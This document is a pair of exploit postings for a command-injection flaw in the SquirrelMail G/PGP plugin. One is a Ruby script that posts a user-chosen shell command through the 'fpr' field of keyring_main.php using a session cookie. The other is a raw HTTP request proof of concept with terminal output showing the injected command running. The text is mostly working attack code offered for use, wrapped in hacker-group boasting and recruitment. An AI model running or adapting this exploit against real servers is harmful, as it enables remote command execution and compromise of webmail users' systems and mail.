SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit Code: =============================================================== SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit =============================================================== #!/usr/local/bin/ruby puts"http://backdoored.net\n" puts "SquirrelMail G/PG deletekey() command injection exploit\n" puts "Coded by Backdoored member. \n" puts "--------------------------------------------------\n" if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil puts "Usage: ./squ_xploit hostname path port cookie command 0\n" puts "if host using ssl use 1 instead of 0\n" exit end require 'net/http' require 'net/https' host = ARGV[0].to_s port = ARGV[2].to_i cookie = ARGV[3].to_s victim = Net::HTTP.new(host,port) if ARGV[3].to_i == 1 puts "Entering SSL mode baby\n" victim.use_ssl = true end command = ARGV[4].to_s #path = '/sq/plugins/gpg/modules/keyring_main.php' path = ARGV[1].to_s data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1" pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie; headers = { 'Cookie' => pizza, 'Referer' => 'http://www.google.com', 'Content-Type' => 'application/x-www-form-urlencoded' } resp, data = victim.post(path,data,headers) puts 'Message = ' + resp.message puts 'Code = ' + resp.code resp.each {|key,val| puts key + ' = ' + val} #puts data
SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln Code: ================================================================ SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln ================================================================ SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability Bugtraq ID: 24782 ----------------------------- There are various vulnerabilities in this software! One is in keyring_main.php! $fpr is not escaped from shellcommands! testbox:/home/w00t# cat /tmp/w00t cat: /tmp/w00t: No such file or directory testbox:/home/w00t# ***@silverlaptop:~$ nc *** 80 POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1 Host: *** User-Agent: w00t Keep-Alive: 300 Connection: keep-alive Cookie: Authentication Data for SquirrelMail Content-Type: application/x-www-form-urlencoded Content-Length: 140 id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 ... testbox:/home/w00t# cat /tmp/w00t testbox:/home/w00t# So we just executed 'touch /tmp/w00t'! WabiSabiLabi tries to sell the exploit for 700 Euro! ;) lol @ WabiSabiLabi! Greets: oli and all members of jmp-esp! jmp-esp is looking for people who are interested in IT security! Currently we are looking for people who like to write articles for a German ezine or are interested in exchanging informations, exploits... IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) #main
